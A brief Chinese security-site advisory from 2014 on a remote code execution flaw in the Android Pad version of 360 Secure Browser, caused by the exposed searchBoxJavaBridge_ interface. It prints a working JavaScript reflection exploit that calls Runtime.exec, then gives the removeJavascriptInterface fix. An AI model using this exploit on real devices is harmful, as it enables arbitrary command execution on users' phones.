360安全浏览器Pad版远程代码执行漏洞下载

来源:黑吧安全网 浏览:1306次 时间:2014-04-28
做网站找雨过天晴工作室

360安全浏览器(安卓7寸Pad版)浏览器来说这种问题还是需要修补的
导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在
function execute(cmdArgs)
{
return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}

修复方案:

需要把这个接口删除,调用removeJavascriptInterface